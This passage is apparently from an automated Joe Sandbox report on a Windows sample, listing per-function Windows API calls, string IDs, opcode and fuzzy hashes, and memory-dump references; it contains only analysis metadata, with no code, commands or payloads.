                                                                                • Opcode ID: cb497278d68a5cacb7968dc52654ea9f439b90fc96a6d000c35d44aafdd686ed
                                                                                • Instruction ID: 279b604d5404425b89812de8f0c9704edb93b8cd8eddbccfbb26c28e92a32e5a
                                                                                • Opcode Fuzzy Hash: cb497278d68a5cacb7968dc52654ea9f439b90fc96a6d000c35d44aafdd686ed
                                                                                • Instruction Fuzzy Hash: 7B21F0316042049FDB10AF28DD85F7EB3A8AF48310F04842EFA46AB3D2CF74AC018B65
                                                                                APIs
                                                                                • IsWindow.USER32(00000000), ref: 00408441
                                                                                • GetForegroundWindow.USER32 ref: 00408458
                                                                                • GetDC.USER32(00000000), ref: 00408494
                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 004084A0
                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 004084DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                • String ID:
                                                                                • API String ID: 4156661090-0
                                                                                • Opcode ID: e95e5340b4eb4ee947f69ab86476d9a7779ced74d250648f03f89de2c98ee0d2
                                                                                • Instruction ID: 8d0721b37c7f500e93c8114dc3e1063a06bfb2cfba316c753af0231e115aaa44
                                                                                • Opcode Fuzzy Hash: e95e5340b4eb4ee947f69ab86476d9a7779ced74d250648f03f89de2c98ee0d2
                                                                                • Instruction Fuzzy Hash: 0B218175A00204AFD700EFA4DD85AAEBBE5EF48301F148879E95A9B252DB74AD01CB64
                                                                                APIs
                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 003CAFE3
                                                                                • SelectObject.GDI32(?,00000000), ref: 003CAFF2
                                                                                • BeginPath.GDI32(?), ref: 003CB009
                                                                                • SelectObject.GDI32(?,00000000), ref: 003CB033
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                • String ID:
                                                                                • API String ID: 3225163088-0
                                                                                • Opcode ID: d3d7b36e3bb9d29a4baa02153012b84cd747c4aa912902ff009aa0dba7f05943
                                                                                • Instruction ID: 0d076b44f5f2c17929f066cac18ce1ad969adce0a2d167360f75271a7daad4cc
                                                                                • Opcode Fuzzy Hash: d3d7b36e3bb9d29a4baa02153012b84cd747c4aa912902ff009aa0dba7f05943
                                                                                • Instruction Fuzzy Hash: E4217FB0800219EFDB12DF69EC89B9E7B68BB10755F14423EE429961B0C3704C95DB99
                                                                                APIs
                                                                                • __calloc_crt.LIBCMT ref: 003D21A9
                                                                                • CreateThread.KERNEL32(?,?,003D22DF,00000000,?,?), ref: 003D21ED
                                                                                • GetLastError.KERNEL32 ref: 003D21F7
                                                                                • _free.LIBCMT ref: 003D2200
                                                                                • __dosmaperr.LIBCMT ref: 003D220B
                                                                                  • Part of subcall function 003D7C0E: __getptd_noexit.LIBCMT ref: 003D7C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                • String ID:
                                                                                • API String ID: 2664167353-0
                                                                                • Opcode ID: 3a141ef3f6aedbea347dc875b24e8e1f7d7bd2004aa17b146eba1395f2c3f7e5
                                                                                • Instruction ID: 15c3910e75772b185186985940005b3e338eefa4a36c1475e98f413055ebb75e
                                                                                • Opcode Fuzzy Hash: 3a141ef3f6aedbea347dc875b24e8e1f7d7bd2004aa17b146eba1395f2c3f7e5
                                                                                • Instruction Fuzzy Hash: ED11C433104706AFDB13AFA5FC42DAB7B98EF55770B11042BF9248A391EB71D81187A1
                                                                                APIs
                                                                                • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 003EABD7
                                                                                • GetLastError.KERNEL32(?,003EA69F,?,?,?), ref: 003EABE1
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,003EA69F,?,?,?), ref: 003EABF0
                                                                                • HeapAlloc.KERNEL32(00000000,?,003EA69F,?,?,?), ref: 003EABF7
                                                                                • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 003EAC0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003F7A74
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003F7A82
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003F7A8A
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003F7A94
• Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003F7AD0
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
APIs
• CLSIDFromProgID.OLE32 ref: 003E9ADC
• ProgIDFromCLSID.OLE32(?,00000000), ref: 003E9AF7
• lstrcmpiW.KERNEL32(?,00000000), ref: 003E9B05
• CoTaskMemFree.OLE32(00000000,?,00000000), ref: 003E9B15
• CLSIDFromString.OLE32(?,?), ref: 003E9B21
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003EAA79
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003EAA83
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003EAA92
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003EAA99
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003EAAAF
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003EAADA
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003EAAE4
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003EAAF3
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003EAAFA
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003EAB10
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
APIs
• GetDlgItem.USER32(?,000003E9), ref: 003EEC94
• GetWindowTextW.USER32(00000000,?,00000100), ref: 003EECAB
• MessageBeep.USER32(00000000), ref: 003EECC3
• KillTimer.USER32(?,0000040A), ref: 003EECDF
• EndDialog.USER32(?,00000001), ref: 003EECF9
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
APIs
• EndPath.GDI32(?), ref: 003CB0BA
• StrokeAndFillPath.GDI32(?,?,0042E680,00000000,?,?,?), ref: 003CB0D6
• SelectObject.GDI32(?,00000000), ref: 003CB0E9
• DeleteObject.GDI32 ref: 003CB0FC
• StrokePath.GDI32(?), ref: 003CB117
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
APIs
• CoInitialize.OLE32(00000000), ref: 003FF2DA
• CoCreateInstance.OLE32(0043DA7C,00000000,00000001,0043D8EC,?), ref: 003FF2F2
• CoUninitialize.OLE32 ref: 003FF555
Strings
Similarity
• API ID: CreateInitializeInstanceUninitialize
• String ID: .lnk
• API String ID: 948891078-24824748
APIs
  • Part of subcall function 003B660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003B53B1,?,?,003B61FF,?,00000000,00000001,00000000), ref: 003B662F
• CoInitialize.OLE32(00000000), ref: 003FE85D
• CoCreateInstance.OLE32(0043DA7C,00000000,00000001,0043D8EC,?), ref: 003FE876
• CoUninitialize.OLE32 ref: 003FE893
  • Part of subcall function 003B936C: __swprintf.LIBCMT ref: 003B93AB
  • Part of subcall function 003B936C: __itow.LIBCMT ref: 003B93DF
Strings
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
• String ID: .lnk
• API String ID: 2126378814-24824748
APIs
• __startOneArgErrorHandling.LIBCMT ref: 003D32ED
  • Part of subcall function 003DE0D0: __87except.LIBCMT ref: 003DE10B
Strings
Similarity
• API ID: ErrorHandling__87except__start
• String ID: pow
• API String ID: 2905807303-2276729525
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0044DC50,?,0000000F,0000000C,00000016,0044DC50,?), ref: 003F4645
                                                                                  • Part of subcall function 003B936C: __swprintf.LIBCMT ref: 003B93AB
                                                                                  • Part of subcall function 003B936C: __itow.LIBCMT ref: 003B93DF
                                                                                • CharUpperBuffW.USER32(?,?,00000000,?), ref: 003F46C5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper$__itow__swprintf
                                                                                • String ID: REMOVE$THIS
                                                                                • API String ID: 3797816924-776492005
                                                                                • Opcode ID: 3fe15131b744e22bd300d22fa92bdd451453a6f034126cf4356570b7f9d44ef5
                                                                                • Instruction ID: 3897e50d6830c08c034b26b34dd6e54770dfa954ff20968126ad543322be87d8
                                                                                • Opcode Fuzzy Hash: 3fe15131b744e22bd300d22fa92bdd451453a6f034126cf4356570b7f9d44ef5
                                                                                • Instruction Fuzzy Hash: 94414234A0021D9FCF02EF54C881ABEB7B5FF49304F148469EA16AB661DB74DD45CB50
                                                                                APIs
                                                                                  • Part of subcall function 003F430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003EBC08,?,?,00000034,00000800,?,00000034), ref: 003F4335
                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 003EC1D3
                                                                                  • Part of subcall function 003F42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003EBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 003F4300
                                                                                  • Part of subcall function 003F422F: GetWindowThreadProcessId.USER32(?,?), ref: 003F425A
                                                                                  • Part of subcall function 003F422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,003EBBCC,00000034,?,?,00001004,00000000,00000000), ref: 003F426A
                                                                                  • Part of subcall function 003F422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,003EBBCC,00000034,?,?,00001004,00000000,00000000), ref: 003F4280
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003EC240
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003EC28D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                • String ID: @
                                                                                • API String ID: 4150878124-2766056989
                                                                                • Opcode ID: f2e17e7c7d27157ae1412044ab381b6be61abc5dab34bbe991279ed244463fb6
                                                                                • Instruction ID: f4bcbcb1ff0e9bf53cbd0e3784d8247f007f357cdae247465b005254715636bf
                                                                                • Opcode Fuzzy Hash: f2e17e7c7d27157ae1412044ab381b6be61abc5dab34bbe991279ed244463fb6
                                                                                • Instruction Fuzzy Hash: 62413A7690021CBFDB12DFA4CC82AEEB7B8BF09300F004595FA55BB181DA71AE55CB61
                                                                                APIs
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0044DC00,00000000,?,?,?,?), ref: 0041A6D8
                                                                                • GetWindowLongW.USER32 ref: 0041A6F5
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0041A705
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long
                                                                                • String ID: SysTreeView32
                                                                                • API String ID: 847901565-1698111956
                                                                                • Opcode ID: 9e5a470fb0501c2c154f36b86e223992d3a3a861965c1e5947154813dee05c02
                                                                                • Instruction ID: 2c490bd3f77b2603d5cc0153c1f4ca1f46a5327a93b72bee986958de91bb2aa8
                                                                                • Opcode Fuzzy Hash: 9e5a470fb0501c2c154f36b86e223992d3a3a861965c1e5947154813dee05c02
                                                                                • Instruction Fuzzy Hash: 4C31A031601205ABDB118E38DC41BE777A9EB49324F244726F8B5932E0D734EDA08B59
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00405190
                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 004051C6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CrackInternet_memset
                                                                                • String ID: |$D@
                                                                                • API String ID: 1413715105-3930294801
                                                                                • Opcode ID: 92059676987da3e651f4344a3794b74fb7a9773dae8fe1842e9033d5c1526b13
                                                                                • Instruction ID: 804d9ae25570695d3f72bbe30048b6616f1289afe6dd16bb24ae8d25f6da3865
                                                                                • Opcode Fuzzy Hash: 92059676987da3e651f4344a3794b74fb7a9773dae8fe1842e9033d5c1526b13
                                                                                • Instruction Fuzzy Hash: 68313A71C10119ABCF11EFA4CC45AEE7FB9FF54704F00006AE915AA166DB35A906CF60
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0041A15E
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0041A172
                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 0041A196
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window
                                                                                • String ID: SysMonthCal32
                                                                                • API String ID: 2326795674-1439706946
                                                                                • Opcode ID: ee0184631fc63608bb80f3c6a23c2f04102c527d396c3e666e8d04ba5e62a71e
                                                                                • Instruction ID: f5d6108f916b48e2d0afc95204388edf120534d101302a5babfd491961ecdae1
                                                                                • Opcode Fuzzy Hash: ee0184631fc63608bb80f3c6a23c2f04102c527d396c3e666e8d04ba5e62a71e
                                                                                • Instruction Fuzzy Hash: 23219F32510218BBDF128FA4CC42FEA3B79EF48714F110215FE55AB1D0D6B9ACA5CBA4
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0041A941
                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0041A94F
                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0041A956
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$DestroyWindow
                                                                                • String ID: msctls_updown32
                                                                                • API String ID: 4014797782-2298589950
                                                                                • Opcode ID: b9e84c534852a28fff63e5278e17cc820c4d16327a14b743c895c617c8367472
                                                                                • Instruction ID: c13b3094601b90cd96ba88163aadf8c14a96177a2111b4e280e2b17606a6ad15
                                                                                • Opcode Fuzzy Hash: b9e84c534852a28fff63e5278e17cc820c4d16327a14b743c895c617c8367472
                                                                                • Instruction Fuzzy Hash: 3F21B2B5610209AFDB01DF28DC82DB737ACEB5A354B05045AFA04DB361CB34EC918B65
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00419A30
                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00419A40
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00419A65
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$MoveWindow
                                                                                • String ID: Listbox
                                                                                • API String ID: 3315199576-2633736733
                                                                                • Opcode ID: d1cb35c0c0ad214622a4466156344db4c645d58e361ba33142b74a475713ce6f
                                                                                • Instruction ID: 576544b0101fd67c709e39e07781f77d875b1fa12fe2f91f381fd6d56d378e50
                                                                                • Opcode Fuzzy Hash: d1cb35c0c0ad214622a4466156344db4c645d58e361ba33142b74a475713ce6f
                                                                                • Instruction Fuzzy Hash: FD213772610108BFDF118F54CC81FFF3BAAEF89750F01812AF9049B290C6759C9187A4
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0041A46D
                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0041A482
                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0041A48F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: msctls_trackbar32
                                                                                • API String ID: 3850602802-1010561917
                                                                                • Opcode ID: 0705670f57666f3f2a6d046736bbedf74c1c51a7c47c7e0aac811e5eb4152518
                                                                                • Instruction ID: e2d6012b3f758b8747a5425eba68a7df37786dcb3b298c5ae9fae155581c1851
                                                                                • Opcode Fuzzy Hash: 0705670f57666f3f2a6d046736bbedf74c1c51a7c47c7e0aac811e5eb4152518
                                                                                • Instruction Fuzzy Hash: 43110A71200208BEEF209F65CC49FEB3769EF89754F01412DFA4596191D2B5E861C728
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,003D2350,?), ref: 003D22A1
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 003D22A8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RoInitialize$combase.dll
                                                                                • API String ID: 2574300362-340411864
                                                                                • Opcode ID: a6ddceb71a0353b520b63cb37bb9fe5966420dfbfcad093021d6bc9c258bedf9
                                                                                • Instruction ID: 148bb7d154000eb35c718d284e21257c5bc5cb1a1b3bd24a47b5ebc75022e18c
                                                                                • Opcode Fuzzy Hash: a6ddceb71a0353b520b63cb37bb9fe5966420dfbfcad093021d6bc9c258bedf9
                                                                                • Instruction Fuzzy Hash: 78E01270A95300EBEB616F70FD4AB163B68EB14B06F905431F186E61A4DBFA40A0DF0D
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,003D2276), ref: 003D2376
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 003D237D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RoUninitialize$combase.dll
                                                                                • API String ID: 2574300362-2819208100
                                                                                • Opcode ID: 2bc21d84c02644e170347885edd7f7891dd3491c321deed680ea1f4cd76d39a3
                                                                                • Instruction ID: a562d975cb59e265ab4e51799d7a3669206b32e737631964218e9d45b04d37b9
                                                                                • Opcode Fuzzy Hash: 2bc21d84c02644e170347885edd7f7891dd3491c321deed680ea1f4cd76d39a3
